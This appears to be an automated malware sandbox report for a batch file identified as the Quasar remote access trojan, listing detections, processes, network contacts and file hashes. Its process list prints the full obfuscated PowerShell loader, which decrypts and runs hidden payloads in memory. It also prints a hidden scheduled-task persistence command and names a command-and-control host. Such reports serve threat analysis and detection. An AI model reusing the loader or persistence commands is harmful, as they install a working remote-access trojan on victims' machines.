Analysis Overview
SHA256
c8c3dd02b8fea2a4f8a1eadd7c62d79dfcb147e9766692ee6de40fb6f9cd6ae6
Threat Level: Known bad
The file Zer0.bat was found to be: Known bad.
Malicious Activity Summary
Quasar payload
Quasar RAT
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Looks up external IP address via web service
Enumerates physical storage devices
Modifies registry class
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-06-08 14:02
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-08 14:02
Reported
2024-06-08 14:04
Platform
win11-20240419-en
Max time kernel
82s
Max time network
75s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Enumerates physical storage devices
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1474490143-3221292397-4168103503-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Zer0.bat"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zBaaBHx3j6AC8AgsWtzNY4o+cs5Hsz8D2jNBVxJlNss='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw9FJUazyFqyLpZQ1HfDnQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OHDMP=New-Object System.IO.MemoryStream(,$param_var); $rDLhe=New-Object System.IO.MemoryStream; $cpSWI=New-Object System.IO.Compression.GZipStream($OHDMP, [IO.Compression.CompressionMode]::Decompress); $cpSWI.CopyTo($rDLhe); $cpSWI.Dispose(); $OHDMP.Dispose(); $rDLhe.Dispose(); $rDLhe.ToArray();}function execute_function($param_var,$param2_var){ $iuAAC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TqwFC=$iuAAC.EntryPoint; $TqwFC.Invoke($null, $param2_var);}$nVyiT = 'C:\Users\Admin\AppData\Local\Temp\Zer0.bat';$host.UI.RawUI.WindowTitle = $nVyiT;$zgURt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nVyiT).Split([Environment]::NewLine);foreach ($wDQfL in $zgURt) { if ($wDQfL.StartsWith('kDFoazWuFjsDUKvTgCbr')) { $KlmyM=$wDQfL.Substring(20); break; }}$payloads_var=[string[]]$KlmyM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_696_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat" "
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zBaaBHx3j6AC8AgsWtzNY4o+cs5Hsz8D2jNBVxJlNss='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Bw9FJUazyFqyLpZQ1HfDnQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $OHDMP=New-Object System.IO.MemoryStream(,$param_var); $rDLhe=New-Object System.IO.MemoryStream; $cpSWI=New-Object System.IO.Compression.GZipStream($OHDMP, [IO.Compression.CompressionMode]::Decompress); $cpSWI.CopyTo($rDLhe); $cpSWI.Dispose(); $OHDMP.Dispose(); $rDLhe.Dispose(); $rDLhe.ToArray();}function execute_function($param_var,$param2_var){ $iuAAC=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TqwFC=$iuAAC.EntryPoint; $TqwFC.Invoke($null, $param2_var);}$nVyiT = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat';$host.UI.RawUI.WindowTitle = $nVyiT;$zgURt=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($nVyiT).Split([Environment]::NewLine);foreach ($wDQfL in $zgURt) { if ($wDQfL.StartsWith('kDFoazWuFjsDUKvTgCbr')) { $KlmyM=$wDQfL.Substring(20); break; }}$payloads_var=[string[]]$KlmyM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| DE | 193.161.193.99:61208 | runderscore00-61208.portmap.host | tcp |
Files
memory/2912-0-0x00007FF8359D3000-0x00007FF8359D5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qsu4je5i.bbc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2912-10-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
memory/2912-9-0x000001CE7F570000-0x000001CE7F592000-memory.dmp
memory/2912-11-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
memory/2912-12-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
memory/2912-13-0x000001CE7FAC0000-0x000001CE7FB06000-memory.dmp
memory/2912-14-0x000001CE7F5B0000-0x000001CE7F5B8000-memory.dmp
memory/2912-15-0x000001CE7FB10000-0x000001CE7FB80000-memory.dmp
memory/3432-25-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
memory/3432-26-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
memory/3432-27-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
memory/3432-30-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | df472dcddb36aa24247f8c8d8a517bd7 |
| SHA1 | 6f54967355e507294cbc86662a6fbeedac9d7030 |
| SHA256 | e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6 |
| SHA512 | 06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.vbs
| MD5 | b9e6132dd195db4d43770b394de14f31 |
| SHA1 | 1c5dce6b9ac1d7476ae3654386ed6032c00cde36 |
| SHA256 | 82752211d13d9e5eae1bbff22e2137b65fe0eecce172f6c5cab6060925adc308 |
| SHA512 | 07e97cc980a70df0f20ae37131e4db50428a41a50b6356ebcf035ec0942c9d878d005d8c4306ed54b1918c35b0383a5acd1ebe8c679c4610d292b2b3da0d2cc2 |
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_696.bat
| MD5 | 23e8182ee8e5dc33add24206b72fe1b2 |
| SHA1 | 744ef302e11c315fa8af3d2ba2830fdc326110ac |
| SHA256 | c8c3dd02b8fea2a4f8a1eadd7c62d79dfcb147e9766692ee6de40fb6f9cd6ae6 |
| SHA512 | 520911a8894efb73dcadf73a74a1721e852979eea54255160819e6485b40f4026216fa70f7d008c5762edc26a6a241bf216c1ef358ee97fb08a3c823a4cbb32d |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
| MD5 | 3ec0d76d886b2f4b9f1e3da7ce9e2cd7 |
| SHA1 | 68a6a2b7b0fa045cd9cf7d63d4e30600a7b25dea |
| SHA256 | 214be9e8293b00fc05089068033edb41da350e0f127dd782bf6cb748000a56a5 |
| SHA512 | a49d758d03e3a7bc38be29d577c3e0d0c69eb08d0496a81b9406b446c5808d7dfbab39c5be3b45cbb4aec511d87c6166453cbd12cebe5d8663a60b5d773206c6 |
memory/3260-47-0x0000000005A60000-0x0000000005A8A000-memory.dmp
memory/2060-99-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1224-109-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1624-110-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/3396-108-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1428-107-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1584-106-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/2252-105-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/2636-104-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1072-103-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1120-102-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1300-101-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/760-100-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1108-98-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/2912-122-0x00007FF8359D0000-0x00007FF836492000-memory.dmp
memory/2920-97-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/1764-96-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/3260-95-0x00007FF816E10000-0x00007FF816E20000-memory.dmp
memory/2180-144-0x000002126EF40000-0x000002126EF9E000-memory.dmp
memory/2180-145-0x000002126F3C0000-0x000002126F3D2000-memory.dmp
memory/2180-146-0x000002126F420000-0x000002126F45C000-memory.dmp